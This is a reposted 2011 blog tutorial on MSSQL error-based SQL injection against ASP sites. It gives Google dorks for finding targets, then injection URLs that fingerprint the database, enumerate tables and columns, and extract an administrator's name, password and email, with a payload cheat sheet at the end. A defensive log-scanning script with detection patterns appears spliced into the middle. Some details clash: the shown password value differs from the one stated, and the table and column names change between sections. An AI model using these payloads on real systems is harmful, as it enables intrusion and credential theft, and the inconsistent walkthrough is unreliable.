Sunday, 21 August 2011

My SQL injection, method of attack!



MSSQL - injection, method of attack!
###########################


1.1 Introduction 
1.2 How to find a vulnerable page? 
1.3 How to prove that the site is vulnerable? 
1.4 How to find the version / name of the DB? 
1.5 How to discover the table names (table_name)? 
1.6 How to discover the column names (column_name)? 
1.7 How to get data from the tables that interest us (e.g. name, pass, email, etc.)? 
1.8 Conclusion





[1.1 Introduction] 
############


This lesson will try to explain MSSQL injection, assuming you already know the different techniques. 
Here you will have the opportunity to learn how this method is used as a favourite way to obtain information (name, password and login) or various other information through this technique. 
MSSQL injection can be used against products created by the well-known company Microsoft. 
This type of injection therefore deals with sites that are coded in ASP / ASPX etc. 


There are several types of attacks of this kind: 


* - Normal MSSQL injection attacks 
* - MSSQL injection in web services (SOAP injection) 
* - UNION-based MSSQL injection attacks 
* - ODBC error attacks using "Convert" 
* - MSSQL blind SQL injection attacks, etc. 


For writing this, the following type of attack will be used: 


"Attack using the ODBC error message from 'Convert'"




[1.2 How to find a vulnerable page? ] 
############################


Finding a vulnerable page is easy. For this we can use the services of the giant company Google. 


Let's open Google. 


I write, for example: 

inurl:"products" "ID" 
inurl:"neus.asp" "menu" 
inurl:"content.asp" "under" 
inurl:"games.asp" "ID" 

ETC.... (I gave only a few examples; you can now use logic for better dorks)


[1.3 How to prove that the site is vulnerable? ] 
##################################


We can tell very easily by adding a single quote (') after the ID in the page URL. 
If the answer we get back is an error page, it means the page is vulnerable. Examples: 


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
/ Microsoft Access ODBC driver / 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
/ Unclosed quotation mark / 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
/ Microsoft OLE DB Provider for Oracle / 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
/ Division by zero in / 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 


These are some of the most common responses shown by pages that are vulnerable to MSSQL injection. 


Now let's act on an example here, and see where to put the single quote ('). 




For example:


------------------------------------------------------------ 
[site]/news.asp?id=100' 
------------------------------------------------------------ 


Now we can see the error that is displayed: 


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e14' 


Unclosed quotation mark after the character string ') AND (Volgorde > 0) ORDER BY Volgorde'. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 


This page is vulnerable!




[1.4 How to find the version / DB name? ] 
############################




Let's take an example to make it easier to understand: 


Version: 


------------------------------------------------------------ 
[site]/news.asp?id=100+or+1=convert(int,@@version)-- 
------------------------------------------------------------ 




And we are presented with something like this: 


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2) (SM)' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 






Now let's find the DB name (DB_Name): 


------------------------------------------------------------ 
[site]/news.asp?id=100+or+1=convert(int,DB_Name())-- 
------------------------------------------------------------ 


e.g.: 




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value 'EVILZONE_CREW_DB' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
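The probes in sections 1.3 and 1.4 only work because the application echoes the raw OLE DB / ODBC error back to the browser, and they leave a very recognisable trail in the web-server log: a numeric id followed by a quote, or by "or 1=convert(int, ...)" wrapping @@version, DB_Name() or an information_schema lookup, usually paired with a 500 status. The following Python script is an added example, not part of the original tutorial; it scans constructed IIS-style (W3C) log lines for those markers. The log layout, the rule names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (W3C-style fields: date time method uri-stem uri-query status).
# The lines are made up for this example; the query values mirror the tutorial's probes.
SAMPLE_LOG = """\
2011-08-21 10:00:01 GET /news.asp id=100 200
2011-08-21 10:00:05 GET /news.asp id=100' 500
2011-08-21 10:00:09 GET /news.asp id=100+or+1=convert(int,@@version)-- 500
2011-08-21 10:00:14 GET /news.asp id=100+or+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2011-08-21 10:00:20 GET /news.asp id=101 200
2011-08-21 10:00:25 GET /games.asp id=7 200
"""

# Each rule is (name, regex) applied to the URL-decoded, lower-cased query string.
RULES = [
    ("convert-to-int error probe", re.compile(r"convert\s*\(\s*int\s*,")),
    ("information_schema enumeration", re.compile(r"information_schema\.(tables|columns)")),
    ("version/db fingerprint", re.compile(r"@@version|db_name\s*\(")),
    ("sql comment terminator", re.compile(r"--\s*$")),
    ("stray quote after numeric id", re.compile(r"(?:^|&)id=\d+'")),
]


def parse_line(line):
    """Split one log line into its fields; return None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 6:
        return None
    date, time, method, stem, query, status = parts
    # unquote_plus turns '+' into spaces and decodes %XX, so the rules see real SQL text.
    return {
        "when": f"{date} {time}",
        "method": method,
        "stem": stem,
        "query": unquote_plus(query).lower(),
        "status": int(status),
    }


def scan(log_text):
    """Return [(line_number, http_status, [matched rule names]), ...] for suspicious requests."""
    hits = []
    for number, raw in enumerate(log_text.splitlines(), start=1):
        record = parse_line(raw)
        if record is None:
            continue
        matched = [name for name, rx in RULES if rx.search(record["query"])]
        if matched:
            hits.append((number, record["status"], matched))
    return hits


def count_by_rule(hits):
    """Aggregate hits per rule, useful for a quick triage summary."""
    counts = {}
    for _, _, names in hits:
        for name in names:
            counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for number, status, names in found:
        # A 500 together with one of these markers is the strongest signal that the
        # verbose error path was reached.
        print(f"line {number} (HTTP {status}): {', '.join(names)}")
    print(count_by_rule(found))
```

Running it flags lines 2, 3 and 4 of the sample; the clean requests on lines 1, 5 and 6 produce no hit. The same rules can be fed into a SIEM or WAF signature, and the stray-quote rule is the cheapest one to alert on for any parameter that should only ever be numeric.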


[1.5 How to discover the names table (table_name)] 
######################################




Discovering the table names, or simply finding them, goes through this method. 


For example: 


------------------------------------------------------------ 
[site]/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))-- 
------------------------------------------------------------ 




And now an error will appear, such as: 


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value 'Users' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 




That is, in this case the first table (table_name) is 'Users'; now let's find the next table: 


For example: 


------------------------------------------------------------ 
[site]/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))-- 
------------------------------------------------------------ 




And now the same error message will appear, giving us another table: 


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value 'news' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 


The other table in this case is 'news'. 


Now, to find the third table (table_name), it goes like this: 


For example: 




------------------------------------------------------------ 
[site]/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news')))-- 
------------------------------------------------------------ 




The third table appears to us: 




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value 'categories' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 




So the third table is 'categories', and so on until you find all the tables. 


For example: 




------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news','categories')))-- 
------------------------------------------------------------


[1.6 How to discover the names of column (column_name)] 
###########################################


If you want the column_name for the table 'Users', go like this: 


For example: 




------------------------------------------------------------ 
[site]/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))-- 
------------------------------------------------------------ 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value 'Name' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 


So the column name for the table (table_name) 'Users' is 'name'. 


Now let's find the other columns (column_name) of the same table 'Users': 


For example: 




------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name')))-- 
------------------------------------------------------------ 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value 'password' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 




The other column name (column_name) is 'password'; now let's find the next column_name: 


For example: 


------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name','password')))-- 
------------------------------------------------------------ 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value 'emailaddress' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 


Therefore the third column_name is 'emailaddress', and so on until the end, to find all of the columns (column_name)!






[1.7 How to get the data that interests us (user name, pass, email, etc.)] 
################################################## ###




To do so you do not need anything different from what we mentioned before. 
In this section, all that needs to be done is to use the table (table_name) and the column names (column_name) found in the earlier results. 


In this section we will use: 
Table_name = Users 
Column_name = name, password, emailaddress 


Now let's put them into the example: 




------------------------------------------------------------ 
[site]/news.asp?id=100+or+1=convert(int,(select top 1 name from Users))-- 
------------------------------------------------------------ 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value 'Administrator' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 


user name: Administrator 


Now replacing the first column 'name' with the second column 'password': 


For example: 




------------------------------------------------------------ 
[site]/news.asp?id=100+or+1=convert(int,(select top 1 password from Users))-- 
------------------------------------------------------------ 


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Microsoft OLE DB Provider for SQL Server error '80040e07' 


Conversion failed when converting the nvarchar value '123456' to data type int. 


/MSN/shared/includes/main_rub.asp, Line 4 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 




password: administratorpassword123


Now, for the remaining column, it works the same as above: 


For example: 




------------------------------------------------------------ 
[site]/news.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))-- 
------------------------------------------------------------ 


emailaddress: king.cyborg@yahoo.com


So here we have obtained some info: the name / pass and emailaddress of the page.


user name: Administrator 
password: administratorpassword123 
emailaddress: king.cyborg@yahoo.com


[1.8 Conclusion]
############


============================================================
[site]/news.asp?id=100'
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,@@version)--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,DB_Name())--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 username from Users))--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
------------------------------------------------------------
[site]/news.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
============================================================


NOTE: This Tut Is Not Written By Me !
